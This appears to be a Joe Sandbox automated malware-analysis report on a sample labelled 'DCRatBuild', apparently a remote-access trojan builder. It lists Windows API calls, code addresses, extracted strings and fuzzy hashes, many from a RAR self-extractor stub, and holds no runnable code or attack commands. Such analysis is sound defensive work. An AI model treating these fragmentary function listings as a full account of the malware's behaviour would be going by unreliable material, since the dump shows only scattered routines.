                                                                                                                          • Part of subcall function 004A1FBB: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00011FBB,0049C116,00000000,.exe,?,?,00000800,?,?,?,004A8E3C), ref: 004A1FD1
                                                                                                                        • _swprintf.LIBCMT ref: 00499465
                                                                                                                          • Part of subcall function 00494092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 004940A5
                                                                                                                        • MoveFileW.KERNEL32(?,?), ref: 004994D4
                                                                                                                        • MoveFileW.KERNEL32(?,?), ref: 00499514
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1660450033.0000000000491000.00000020.00000001.01000000.00000005.sdmp, Offset: 00490000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1660435111.0000000000490000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                        • Associated: 00000001.00000002.1660493605.00000000004C3000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004CE000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004D5000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004F2000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                        • Associated: 00000001.00000002.1660555654.00000000004F3000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_490000_DCRatBuild.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: FileMoveNamePath$CompareH_prologLongShortString__vswprintf_c_l_swprintf_wcslen
                                                                                                                        • String ID: rtmp%d
                                                                                                                        • API String ID: 3726343395-3303766350
                                                                                                                        • Opcode ID: e13fc6352c1dd129619f5a95fbe3c6fd969387e49bf192141ca014084a976fb4
                                                                                                                        • Instruction ID: 6b90c1e67126b51ede6d6e66b2c22a87d756442aa065c6b25c1e31d864617810
                                                                                                                        • Opcode Fuzzy Hash: e13fc6352c1dd129619f5a95fbe3c6fd969387e49bf192141ca014084a976fb4
                                                                                                                        • Instruction Fuzzy Hash: 2B41827290026475DF21ABA58D45EDF7B7CAF51344F0048BFB609A3151DA3C8F898B68
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1660450033.0000000000491000.00000020.00000001.01000000.00000005.sdmp, Offset: 00490000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1660435111.0000000000490000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                        • Associated: 00000001.00000002.1660493605.00000000004C3000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004CE000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004D5000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004F2000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                        • Associated: 00000001.00000002.1660555654.00000000004F3000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_490000_DCRatBuild.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: _wcslen
                                                                                                                        • String ID: UJ$pJ$zJ
                                                                                                                        • API String ID: 176396367-3819926901
                                                                                                                        • Opcode ID: 46629b9dd1f047440097a2e501ace831baf0f1043daa8e573e1ce257b0813df6
                                                                                                                        • Instruction ID: 0175c6f05f9074b2b365f22b94399e20cb0bebdabc673bbc59e210332f01aa40
                                                                                                                        • Opcode Fuzzy Hash: 46629b9dd1f047440097a2e501ace831baf0f1043daa8e573e1ce257b0813df6
                                                                                                                        • Instruction Fuzzy Hash: 2E41C471A0066A5BCB11AF698C059EF7BB8EF01315F00402FF945F7255DE34AE558AA8
APIs
• ShowWindow.USER32(?,00000000), ref: 004A9EEE
• GetWindowRect.USER32(?,00000000), ref: 004A9F44
• ShowWindow.USER32(?,00000005,00000000), ref: 004A9FDB
• SetWindowTextW.USER32(?,00000000), ref: 004A9FE3
• ShowWindow.USER32(00000000,00000005), ref: 004A9FF9
Strings
Memory Dump Source
• Source File: 00000001.00000002.1660450033.0000000000491000.00000020.00000001.01000000.00000005.sdmp, Offset: 00490000, based on PE: true
• Associated: 00000001.00000002.1660435111.0000000000490000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.1660493605.00000000004C3000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.1660510083.00000000004CE000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.1660510083.00000000004D5000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.1660510083.00000000004F2000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.1660555654.00000000004F3000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_490000_DCRatBuild.jbxd
Similarity
• API ID: Window$Show$RectText
• String ID: J$RarHtmlClassName
• API String ID: 3937224194-751939351
APIs
• __aulldiv.LIBCMT ref: 004A122E
  • Part of subcall function 0049B146: GetVersionExW.KERNEL32(?), ref: 0049B16B
• FileTimeToLocalFileTime.KERNEL32(00000003,00000000,00000003,?,00000064,00000000,00000000,?), ref: 004A1251
• FileTimeToSystemTime.KERNEL32(00000003,?,00000003,?,00000064,00000000,00000000,?), ref: 004A1263
• SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?), ref: 004A1274
• SystemTimeToFileTime.KERNEL32(?,?), ref: 004A1284
• SystemTimeToFileTime.KERNEL32(?,?), ref: 004A1294
• FileTimeToSystemTime.KERNEL32(?,?,?), ref: 004A12CF
• __aullrem.LIBCMT ref: 004A1379
Similarity
• API ID: Time$File$System$Local$SpecificVersion__aulldiv__aullrem
• String ID:
• API String ID: 1247370737-0
APIs
• _swprintf.LIBCMT ref: 00492536
  • Part of subcall function 00494092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 004940A5
  • Part of subcall function 004A05DA: _wcslen.LIBCMT ref: 004A05E0
Strings
Similarity
• API ID: __vswprintf_c_l_swprintf_wcslen
• String ID: ;%u$x%u$xc%u
• API String ID: 3053425827-2277559157
APIs
Strings
Similarity
• API ID: _wcslen
• String ID: </p>$</style>$<br>$<style>$>
• API String ID: 176396367-3568243669
APIs
• GetConsoleCP.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,004BFE02,00000000,00000000,00000000,00000000,00000000,?), ref: 004BF6CF
• __fassign.LIBCMT ref: 004BF74A
• __fassign.LIBCMT ref: 004BF765
• WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,00000000,00000005,00000000,00000000), ref: 004BF78B
• WriteFile.KERNEL32(?,00000000,00000000,004BFE02,00000000,?,?,?,?,?,?,?,?,?,004BFE02,00000000), ref: 004BF7AA
• WriteFile.KERNEL32(?,00000000,00000001,004BFE02,00000000,?,?,?,?,?,?,?,?,?,004BFE02,00000000), ref: 004BF7E3
Similarity
• API ID: FileWrite__fassign$ByteCharConsoleMultiWide
• String ID:
• API String ID: 1324828854-0
APIs
• GetTempPathW.KERNEL32(00000800,?), ref: 004ACE9D
  • Part of subcall function 0049B690: _wcslen.LIBCMT ref: 0049B696
• _swprintf.LIBCMT ref: 004ACED1
  • Part of subcall function 00494092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 004940A5
• SetDlgItemTextW.USER32(?,00000066,004D946A), ref: 004ACEF1
• _wcschr.LIBVCRUNTIME ref: 004ACF22
• EndDialog.USER32(?,00000001), ref: 004ACFFE
Strings
Similarity
• API ID: DialogItemPathTempText__vswprintf_c_l_swprintf_wcschr_wcslen
• String ID: %s%s%u
• API String ID: 689974011-1360425832
APIs
• _ValidateLocalCookies.LIBCMT ref: 004B2937
• ___except_validate_context_record.LIBVCRUNTIME ref: 004B293F
• _ValidateLocalCookies.LIBCMT ref: 004B29C8
• __IsNonwritableInCurrentImage.LIBCMT ref: 004B29F3
• _ValidateLocalCookies.LIBCMT ref: 004B2A48
Strings
Similarity
• API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
• String ID: csm
• API String ID: 1170836740-1018135373
Memory Dump Source
• Source File: 00000001.00000002.1660450033.0000000000491000.00000020.00000001.01000000.00000005.sdmp, Offset: 00490000, based on PE: true
• Associated: 00000001.00000002.1660435111.0000000000490000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.1660493605.00000000004C3000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.1660510083.00000000004CE000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.1660510083.00000000004D5000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.1660510083.00000000004F2000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.1660555654.00000000004F3000.00000002.00000001.01000000.00000005.sdmp
Similarity
• API ID: _wcslen
• String ID: $&nbsp;$<br>$<style>body{font-family:"Arial";font-size:12;}</style>
APIs
  • Part of subcall function 004BC868: _free.LIBCMT ref: 004BC891
• _free.LIBCMT ref: 004BC8F2
  • Part of subcall function 004B8DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,004BC896,?,00000000,?,00000000,?,004BC8BD,?,00000007,?,?,004BCCBA,?), ref: 004B8DE2
  • Part of subcall function 004B8DCC: GetLastError.KERNEL32(?,?,004BC896,?,00000000,?,00000000,?,004BC8BD,?,00000007,?,?,004BCCBA,?,?), ref: 004B8DF4
• _free.LIBCMT ref: 004BC8FD
• _free.LIBCMT ref: 004BC908
• _free.LIBCMT ref: 004BC95C
• _free.LIBCMT ref: 004BC967
• _free.LIBCMT ref: 004BC972
• _free.LIBCMT ref: 004BC97D
Similarity
• API ID: _free$ErrorFreeHeapLast
• String ID:
APIs
• GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,?,004AE669,004AE5CC,004AE86D), ref: 004AE605
• GetProcAddress.KERNEL32(00000000,AcquireSRWLockExclusive), ref: 004AE61B
• GetProcAddress.KERNEL32(00000000,ReleaseSRWLockExclusive), ref: 004AE630
Similarity
• API ID: AddressProc$HandleModule
• String ID: AcquireSRWLockExclusive$KERNEL32.DLL$ReleaseSRWLockExclusive
APIs
• _free.LIBCMT ref: 004B891E
  • Part of subcall function 004B8DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,004BC896,?,00000000,?,00000000,?,004BC8BD,?,00000007,?,?,004BCCBA,?), ref: 004B8DE2
  • Part of subcall function 004B8DCC: GetLastError.KERNEL32(?,?,004BC896,?,00000000,?,00000000,?,004BC8BD,?,00000007,?,?,004BCCBA,?,?), ref: 004B8DF4
• _free.LIBCMT ref: 004B8930
• _free.LIBCMT ref: 004B8943
• _free.LIBCMT ref: 004B8954
• _free.LIBCMT ref: 004B8965
Similarity
• API ID: _free$ErrorFreeHeapLast
• String ID: pL
APIs
• SystemTimeToFileTime.KERNEL32(?,?), ref: 004A14C2
  • Part of subcall function 0049B146: GetVersionExW.KERNEL32(?), ref: 0049B16B
• LocalFileTimeToFileTime.KERNEL32(?,?), ref: 004A14E6
• FileTimeToSystemTime.KERNEL32(?,?), ref: 004A1500
• TzSpecificLocalTimeToSystemTime.KERNEL32(00000000,?,?), ref: 004A1513
• SystemTimeToFileTime.KERNEL32(?,?), ref: 004A1523
• SystemTimeToFileTime.KERNEL32(?,?), ref: 004A1533
Similarity
• API ID: Time$File$System$Local$SpecificVersion
• String ID:
APIs
• GetLastError.KERNEL32(?,?,004B2AF1,004B02FC,004AFA34), ref: 004B2B08
• ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 004B2B16
• ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 004B2B2F
• SetLastError.KERNEL32(00000000,004B2AF1,004B02FC,004AFA34), ref: 004B2B81
Similarity
• API ID: ErrorLastValue___vcrt_
• String ID:
APIs
• GetLastError.KERNEL32(?,004D1030,004B4674,004D1030,?,?,004B3F73,00000050,?,004D1030,00000200), ref: 004B97E9
• _free.LIBCMT ref: 004B981C
• _free.LIBCMT ref: 004B9844
• SetLastError.KERNEL32(00000000,?,004D1030,00000200), ref: 004B9851
• SetLastError.KERNEL32(00000000,?,004D1030,00000200), ref: 004B985D
• _abort.LIBCMT ref: 004B9863
Similarity
• API ID: ErrorLast$_free$_abort
• String ID:
                                                                                                                        • API String ID: 3160817290-0
                                                                                                                        • Opcode ID: 4cd85ed6ee29d111f2d55b32e7d2a5657e9f20ba5869c79f10d269f9b5e3b589
                                                                                                                        • Instruction ID: 2106faaecfc57660f7bdc0d0eb2491778d76870c775223dbd99c199315b9bae0
                                                                                                                        • Opcode Fuzzy Hash: 4cd85ed6ee29d111f2d55b32e7d2a5657e9f20ba5869c79f10d269f9b5e3b589
                                                                                                                        • Instruction Fuzzy Hash: 87F0A43615460166C6923736AC4AFEB2A698FD2769F25013FF71492292EF2CCC06857D
                                                                                                                        APIs
                                                                                                                        • WaitForSingleObject.KERNEL32(?,0000000A), ref: 004ADC47
                                                                                                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 004ADC61
                                                                                                                        • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 004ADC72
                                                                                                                        • TranslateMessage.USER32(?), ref: 004ADC7C
                                                                                                                        • DispatchMessageW.USER32(?), ref: 004ADC86
                                                                                                                        • WaitForSingleObject.KERNEL32(?,0000000A), ref: 004ADC91
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1660450033.0000000000491000.00000020.00000001.01000000.00000005.sdmp, Offset: 00490000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1660435111.0000000000490000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                        • Associated: 00000001.00000002.1660493605.00000000004C3000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004CE000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004D5000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004F2000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                        • Associated: 00000001.00000002.1660555654.00000000004F3000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_490000_DCRatBuild.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Message$ObjectSingleWait$DispatchPeekTranslate
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2148572870-0
                                                                                                                        • Opcode ID: b4d5a8bd2df11f069821cde4f3a15feba694b6cb86d2feca6302d1d8d627df76
                                                                                                                        • Instruction ID: bbba61a3d6380eea0937b856809c06dcd0571476c472fcb6a41a7da876738180
                                                                                                                        • Opcode Fuzzy Hash: b4d5a8bd2df11f069821cde4f3a15feba694b6cb86d2feca6302d1d8d627df76
                                                                                                                        • Instruction Fuzzy Hash: DDF08C32A00219BBCB206FA1DC0CDDF7F7CEF527A2B004022B50AD2014DA389656C7A4
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 004AA699: GetDC.USER32(00000000), ref: 004AA69D
                                                                                                                          • Part of subcall function 004AA699: GetDeviceCaps.GDI32(00000000,0000000C), ref: 004AA6A8
                                                                                                                          • Part of subcall function 004AA699: ReleaseDC.USER32(00000000,00000000), ref: 004AA6B3
                                                                                                                        • GetObjectW.GDI32(?,00000018,?), ref: 004AA83C
                                                                                                                          • Part of subcall function 004AAAC9: GetDC.USER32(00000000), ref: 004AAAD2
                                                                                                                          • Part of subcall function 004AAAC9: GetObjectW.GDI32(?,00000018,?), ref: 004AAB01
                                                                                                                          • Part of subcall function 004AAAC9: ReleaseDC.USER32(00000000,?), ref: 004AAB99
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1660450033.0000000000491000.00000020.00000001.01000000.00000005.sdmp, Offset: 00490000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1660435111.0000000000490000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                        • Associated: 00000001.00000002.1660493605.00000000004C3000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004CE000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004D5000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004F2000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                        • Associated: 00000001.00000002.1660555654.00000000004F3000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_490000_DCRatBuild.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ObjectRelease$CapsDevice
                                                                                                                        • String ID: "J$($AJ
                                                                                                                        • API String ID: 1061551593-3844905542
                                                                                                                        • Opcode ID: 99445b0f6c5bf7d515c2b41debf66fb0c6b962cc21e6f4dc040b55795bf635f7
                                                                                                                        • Instruction ID: 02034e16a13b06e9a7bc230c6e08260b9e88f0ec03dcb27a708b34f13a37e548
                                                                                                                        • Opcode Fuzzy Hash: 99445b0f6c5bf7d515c2b41debf66fb0c6b962cc21e6f4dc040b55795bf635f7
                                                                                                                        • Instruction Fuzzy Hash: 0F91F171208341AFD650DF25C844E2BBBE8FFDA701F00496EF59AD3220DB34A956CB66
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 004A05DA: _wcslen.LIBCMT ref: 004A05E0
                                                                                                                          • Part of subcall function 0049B92D: _wcsrchr.LIBVCRUNTIME ref: 0049B944
                                                                                                                        • _wcslen.LIBCMT ref: 0049C197
                                                                                                                        • _wcslen.LIBCMT ref: 0049C1DF
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1660450033.0000000000491000.00000020.00000001.01000000.00000005.sdmp, Offset: 00490000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1660435111.0000000000490000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                        • Associated: 00000001.00000002.1660493605.00000000004C3000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004CE000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004D5000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004F2000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                        • Associated: 00000001.00000002.1660555654.00000000004F3000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_490000_DCRatBuild.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: _wcslen$_wcsrchr
                                                                                                                        • String ID: .exe$.rar$.sfx
                                                                                                                        • API String ID: 3513545583-31770016
                                                                                                                        • Opcode ID: 3ab8c45ac047dbdd4de0250acf56aa7e82ed652d579e7a6c5d19fdb0240ef471
                                                                                                                        • Instruction ID: c64ba0faa899ea13d4052da206dccb1bdd2506f458e736acc0836ec5285ae63f
                                                                                                                        • Opcode Fuzzy Hash: 3ab8c45ac047dbdd4de0250acf56aa7e82ed652d579e7a6c5d19fdb0240ef471
                                                                                                                        • Instruction Fuzzy Hash: 874159255403119ADF31AF749882A7B7BA8EF55748F20892FF8C16B281EB6C4D81C39D
                                                                                                                        APIs
                                                                                                                        • _wcslen.LIBCMT ref: 0049BB27
                                                                                                                        • GetCurrentDirectoryW.KERNEL32(000007FF,?,?,?,?,00000000,?,?,0049A275,?,?,00000800,?,0049A23A,?,0049755C), ref: 0049BBC5
                                                                                                                        • _wcslen.LIBCMT ref: 0049BC3B
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1660450033.0000000000491000.00000020.00000001.01000000.00000005.sdmp, Offset: 00490000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1660435111.0000000000490000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                        • Associated: 00000001.00000002.1660493605.00000000004C3000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004CE000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004D5000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004F2000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                        • Associated: 00000001.00000002.1660555654.00000000004F3000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_490000_DCRatBuild.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: _wcslen$CurrentDirectory
                                                                                                                        • String ID: UNC$\\?\
                                                                                                                        • API String ID: 3341907918-253988292
                                                                                                                        • Opcode ID: bd86a818bdc60faafb67cef11080740463e58507e340229978bb5469166f7b21
                                                                                                                        • Instruction ID: 2b71f5386379a7950851833acb380c88866a01f0e15a6fdd5b0a315f95a20b79
                                                                                                                        • Opcode Fuzzy Hash: bd86a818bdc60faafb67cef11080740463e58507e340229978bb5469166f7b21
                                                                                                                        • Instruction Fuzzy Hash: 5341C531400215B6DF21AF61EE01EEB7B68EF41355F10853FF954A3251DB78DE908AE8
                                                                                                                        APIs
                                                                                                                        • _wcschr.LIBVCRUNTIME ref: 004ACD84
                                                                                                                          • Part of subcall function 004AAF98: _wcschr.LIBVCRUNTIME ref: 004AB033
                                                                                                                          • Part of subcall function 004A1FBB: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00011FBB,0049C116,00000000,.exe,?,?,00000800,?,?,?,004A8E3C), ref: 004A1FD1
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1660450033.0000000000491000.00000020.00000001.01000000.00000005.sdmp, Offset: 00490000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1660435111.0000000000490000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                        • Associated: 00000001.00000002.1660493605.00000000004C3000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004CE000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004D5000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004F2000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                        • Associated: 00000001.00000002.1660555654.00000000004F3000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_490000_DCRatBuild.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: _wcschr$CompareString
                                                                                                                        • String ID: <$HIDE$MAX$MIN
                                                                                                                        • API String ID: 69343711-3358265660
                                                                                                                        • Opcode ID: 1fa21b53e627b41444e14099671cc69397ad8fc2c93e559c5975aaf795d808ad
                                                                                                                        • Instruction ID: 1febcf4f52f2a033c21b50d7bba3d8d67062512f591685ab9f4f1e216f4bcfd8
                                                                                                                        • Opcode Fuzzy Hash: 1fa21b53e627b41444e14099671cc69397ad8fc2c93e559c5975aaf795d808ad
                                                                                                                        • Instruction Fuzzy Hash: E53166759002599EDF25CB51CC41EEF73B8AB26354F004567F906E7180EBB89A848F95
                                                                                                                        APIs
                                                                                                                        • GetDC.USER32(00000000), ref: 004AAAD2
                                                                                                                        • GetObjectW.GDI32(?,00000018,?), ref: 004AAB01
                                                                                                                        • ReleaseDC.USER32(00000000,?), ref: 004AAB99
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1660450033.0000000000491000.00000020.00000001.01000000.00000005.sdmp, Offset: 00490000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1660435111.0000000000490000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                        • Associated: 00000001.00000002.1660493605.00000000004C3000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004CE000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004D5000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004F2000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                        • Associated: 00000001.00000002.1660555654.00000000004F3000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_490000_DCRatBuild.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ObjectRelease
                                                                                                                        • String ID: -J$7J
                                                                                                                        • API String ID: 1429681911-3530780739
                                                                                                                        • Opcode ID: 06dd1c43c39d516e28dfdfecbcf73a70ee1480bc39125d8e625d46a2a97376db
                                                                                                                        • Instruction ID: 5e7da809d03db3f100890407c6f67cc107d2ce8034d33e0f5e7f8a244f6e31b3
                                                                                                                        • Opcode Fuzzy Hash: 06dd1c43c39d516e28dfdfecbcf73a70ee1480bc39125d8e625d46a2a97376db
                                                                                                                        • Instruction Fuzzy Hash: D521FF72108304BFD3019FA5DC48D7FBFE9FB89356F04042AFA4592124DB319A64CB6A
                                                                                                                        APIs
                                                                                                                        • _swprintf.LIBCMT ref: 0049B9B8
                                                                                                                          • Part of subcall function 00494092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 004940A5
                                                                                                                        • _wcschr.LIBVCRUNTIME ref: 0049B9D6
                                                                                                                        • _wcschr.LIBVCRUNTIME ref: 0049B9E6
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1660450033.0000000000491000.00000020.00000001.01000000.00000005.sdmp, Offset: 00490000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1660435111.0000000000490000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                        • Associated: 00000001.00000002.1660493605.00000000004C3000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004CE000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004D5000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004F2000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                        • Associated: 00000001.00000002.1660555654.00000000004F3000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_490000_DCRatBuild.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: _wcschr$__vswprintf_c_l_swprintf
                                                                                                                        • String ID: %c:\
                                                                                                                        • API String ID: 525462905-3142399695
                                                                                                                        • Opcode ID: 8fd712f9ddcc89447e2c855bc83804b4af65c39b5e23319102260a98b98ef8d8
                                                                                                                        • Instruction ID: 9bc781bfa1a3ddd49e51b57c2046cab82a8a81583b8119f265b0ba4dc17abeb5
                                                                                                                        • Opcode Fuzzy Hash: 8fd712f9ddcc89447e2c855bc83804b4af65c39b5e23319102260a98b98ef8d8
                                                                                                                        • Instruction Fuzzy Hash: B40145A3100311699E30AB76AD42D6BABACEE85370B40442FF544D2282EB2CD80082F9
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00491316: GetDlgItem.USER32(00000000,00003021), ref: 0049135A
                                                                                                                          • Part of subcall function 00491316: SetWindowTextW.USER32(00000000,004C35F4), ref: 00491370
                                                                                                                        • EndDialog.USER32(?,00000001), ref: 004AB2BE
                                                                                                                        • GetDlgItemTextW.USER32(?,00000066,?,00000080), ref: 004AB2D6
                                                                                                                        • SetDlgItemTextW.USER32(?,00000067,?), ref: 004AB304
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1660450033.0000000000491000.00000020.00000001.01000000.00000005.sdmp, Offset: 00490000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1660435111.0000000000490000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                        • Associated: 00000001.00000002.1660493605.00000000004C3000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004CE000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004D5000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004F2000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                        • Associated: 00000001.00000002.1660555654.00000000004F3000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_490000_DCRatBuild.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ItemText$DialogWindow
                                                                                                                        • String ID: GETPASSWORD1$xzN
                                                                                                                        • API String ID: 445417207-2191437676
                                                                                                                        • Opcode ID: e8cd090001a0111344f9c876b1193c0a694a5ecafc3e17524e1ea71b04f85a2c
                                                                                                                        • Instruction ID: 75f23da0eefe947da099c84705bf2ba2d7be4ef5a9cc19db24237c3af90320fd
                                                                                                                        • Opcode Fuzzy Hash: e8cd090001a0111344f9c876b1193c0a694a5ecafc3e17524e1ea71b04f85a2c
